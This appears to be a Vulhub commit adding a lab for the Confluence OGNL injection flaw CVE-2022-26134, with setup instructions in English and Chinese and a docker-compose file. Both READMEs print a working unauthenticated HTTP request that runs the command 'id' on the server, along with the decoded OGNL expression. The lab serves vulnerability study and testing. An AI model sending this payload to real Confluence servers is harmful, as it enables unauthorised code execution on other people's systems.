first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
confluence/CVE-2022-26134/1.png
Normal file
BIN
confluence/CVE-2022-26134/1.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 35 KiB |
BIN
confluence/CVE-2022-26134/2.png
Normal file
BIN
confluence/CVE-2022-26134/2.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 129 KiB |
48
confluence/CVE-2022-26134/README.md
Normal file
48
confluence/CVE-2022-26134/README.md
Normal file
@@ -0,0 +1,48 @@
|
||||
# Atlassian Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Confluence is a web-based corporate wiki developed by Australian software company Atlassian.
|
||||
|
||||
On June 02, 2022 Atlassian released a security advisory for their Confluence Server and Data Center applications, highlighting a critical severity unauthenticated remote code execution vulnerability. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
|
||||
|
||||
References:
|
||||
|
||||
- <https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>
|
||||
- <https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis>
|
||||
|
||||
## Vulnerable Environment
|
||||
|
||||
Execute following command to start a Confluence Server 7.13.6:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the environment starts, visit ``http://your-ip:8090`` and you will see the installation guide, select "Trial installation", then you will be asked to fill in the license key. You should apply for a Confluence Server test certificate from Atlassian.
|
||||
|
||||
Following [this guide](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396) to complete the installation.
|
||||
|
||||
On the database configuration page, fill in the form with database address `db`, database name `confluence`, username `postgres`, password `postgres`.
|
||||
|
||||
|
||||
|
||||
## Exploit
|
||||
|
||||
Simplely send following request to execute arbitrary commands inside an craft OGNL expression and get the response:
|
||||
|
||||
```
|
||||
GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
|
||||
Host: your-ip:8090
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
|
||||
Connection: close
|
||||
|
||||
|
||||
```
|
||||
|
||||
|
||||
|
||||
The URL-decoded OGNL expression is `${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}`.
|
||||
40
confluence/CVE-2022-26134/README.zh-cn.md
Normal file
40
confluence/CVE-2022-26134/README.zh-cn.md
Normal file
@@ -0,0 +1,40 @@
|
||||
# Confluence OGNL表达式注入命令执行漏洞(CVE-2022-26134)
|
||||
|
||||
Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新,通告了一个严重且已在野利用的代码执行漏洞,攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令。
|
||||
|
||||
参考链接:
|
||||
|
||||
- <https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>
|
||||
- <https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis>
|
||||
|
||||
## 漏洞环境
|
||||
|
||||
执行如下命令启动一个Confluence Server 7.13.6:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
环境启动后,访问`http://your-ip:8090`即可进入安装向导,参考[CVE-2019-3396](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396)这个环境中的安装方法,申请试用版许可证。在填写数据库信息的页面,PostgreSQL数据库地址为`db`,数据库名称`confluence`,用户名密码均为`postgres`。
|
||||
|
||||
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
该漏洞利用方法十分简单,直接发送如下请求即可执行任意命令,并在HTTP返回头中获取执行结果:
|
||||
|
||||
```
|
||||
GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
|
||||
Host: your-ip:8090
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
|
||||
Connection: close
|
||||
|
||||
|
||||
```
|
||||
|
||||
|
||||
|
||||
其中使用到的OGNL表达式为`${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}`。
|
||||
13
confluence/CVE-2022-26134/docker-compose.yml
Normal file
13
confluence/CVE-2022-26134/docker-compose.yml
Normal file
@@ -0,0 +1,13 @@
|
||||
version: '2'
|
||||
services:
|
||||
web:
|
||||
image: vulhub/confluence:7.13.6
|
||||
ports:
|
||||
- "8090:8090"
|
||||
depends_on:
|
||||
- db
|
||||
db:
|
||||
image: postgres:12.8-alpine
|
||||
environment:
|
||||
- POSTGRES_PASSWORD=postgres
|
||||
- POSTGRES_DB=confluence
|
||||
Reference in New Issue
Block a user